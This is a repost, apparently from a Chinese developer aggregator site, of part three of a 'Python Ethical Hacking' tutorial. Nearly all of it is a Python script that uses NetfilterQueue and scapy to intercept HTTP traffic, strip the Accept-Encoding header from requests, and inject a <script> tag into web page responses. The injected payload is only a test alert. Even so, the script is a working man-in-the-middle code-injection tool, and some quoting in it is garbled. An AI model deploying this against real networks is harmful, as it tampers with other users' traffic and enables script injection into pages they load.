运维开发网

Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(3)

运维开发网 https://www.qedev.com 2020-07-07 08:51 出处:网络 作者:运维开发网整理
Refactoring and Housekeeping: #!/usr/bin/env python import re from netfilterqueue import NetfilterQueue

Refactoring and Housekeeping:

#!/usr/bin/env python
import re

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import TCP, IP
from scapy.packet import Raw


def set_load(packet, load):
    packet[Raw].load = load
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
        load = scapy_packet[Raw].load
        if scapy_packet[TCP].dport == 80:
            print("[+] Request")
            load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)

        elif scapy_packet[TCP].sport == 80:
            print("[+] Response")
            load = load.replace(b"</body>", b"<script>alert(‘test‘);</script></body>")

        if load != scapy_packet[Raw].load:
            new_packet = set_load(scapy_packet, load)
            packet.set_payload(str(new_packet).encode())

    packet.accept()


queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print(‘‘)
0

上一篇:

:下一篇

精彩评论

暂无评论...
验证码 换一张
取 消